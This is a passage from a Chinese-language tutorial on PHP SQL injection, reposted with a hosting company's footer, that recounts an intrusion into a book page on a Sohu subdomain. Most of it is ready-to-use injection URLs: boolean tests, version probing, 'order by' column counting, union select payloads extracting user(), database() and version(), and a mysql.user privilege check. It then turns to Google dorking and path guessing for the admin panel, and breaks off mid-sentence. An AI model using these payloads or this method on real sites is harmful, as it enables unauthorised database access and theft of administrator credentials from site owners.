PHP的SQL注入

　　返回没有信息如图2，空空的吧，应该是SQL语句结果为空了。

　　通过这两个Url我们可以猜测漏洞是存在的，因为我们提交的and 1=1和and 1=2都被当作Sql语句执行啦!那么我们提交的其他语句也是可以执行的，这就是Sql注入了!我们还可以知道id这个变量是被当作数字处理的，没有放到 ''之间，否则我们是成功不了的哦!如果变量没有过滤Sql其他关键字的话，我们就很有可能成功啦!我遇到很多的情况都是变量过滤了select，在 mysql里就是死路了，好郁闷!

　　既然漏洞是存在的，让我们继续吧!首先当然是探测数据库的类型和连接数据库的帐户啦!权限高并且数据库和web同机器的话可以免除猜测字段的痛苦啦!提交：

　　http://XXX.it.sohu.com/book/serialize.php?id=86 and ord(mid(version(),1,1))>51/*

　　返回正常如图3，这个语句是看数据库的版本是不是高于3的，因为3的ASCII是51嘛!版本的第一个字符是大于51的话当然就是4.0以上啦!4.0以 上是支持union查询的，这样就可以免除一位一位猜测的痛苦哦!这里结果为真，所以数据库是4.0以上的哦，可以支持union了。

　　既然支持union查询就先把这个语句的字段给暴出来吧!以后再用union查询什么都是很快的哦!提交：

　　http://XXX.it.sohu.com/book/serialize.php?id=86 order by 10/*

　　返回结果正常如图4，看来字段是大于10个的，继续提交：

　　http://XXX.it.sohu.com/book/serialize.php?id=86 order by 20/*

　　正常返回，提交：

　　http://XXX.it.sohu.com/book/serialize.php?id=86 order by 30/*

　　......

　　到order by 50的时候返回没有信息了!看来是大于40的小于50的，于是提交：

　　http://XXX.it.sohu.com/book/serialize.php?id=86 order by 45/*

　　......

　　终于猜测到字段是41左右啦!这里说是左右是因为有些字段是不能排序的，所以还需要我们用union精确定位字段数字是41，提交：

　　http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*

　　返回结果如图5，哈哈，成功了哦!哪些字段会在页面显示也是一目了然了!现在让我们继续吧!提交：

　　http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*

　　返回结果如图6，完成了数据库系统的探测哦!我们很有可能不是root，并且数据库服务器和web也很有可能不是在一台服务器，这样的话我们就没有file权限了!提交：

　　http://XXX.it.sohu.com/book/serialize.php?id=86 and (select count(*) from mysql.user)>0/*

　　返回结果如图7，没有对mysql的读取权限，更加确定权限不是root了!呵呵!

　　既然不是root，也不要气馁，让我们继续吧!在进一步猜测数据之前我们最好找下后台先，很多时候找到了管理员密码却找不到地方登陆，很郁闷的说!在根目 录下加/admin和/manage/等等后台常用的地址都是返回404错误，猜测了几次终于在/book/目录下admin的时候出现了403 Forbiden错误，哈哈，是存在这个目录的!但是登陆页面死活也猜不出来，郁闷中!不过既然知道有个admin也好说，去Google里搜索：

　　admin site:sohu.com

　　如图8，得到了另外一个分站的论坛，我们知道人是很懒惰的，通常一个地方的后台的特征就很可能是整个网站的特征，所以当我尝试访问/book/admin /admuser.php的时候奇迹出现了，如图9，哈哈，离成功更

凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务，公司网站：http://www.lingzhong.cn 为了给广大客户了解更多的技术信息，本技术文章收集来源于网络,凌众科技尊重文章作者的版权，如果有涉及你的版权有必要删除你的文章，请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!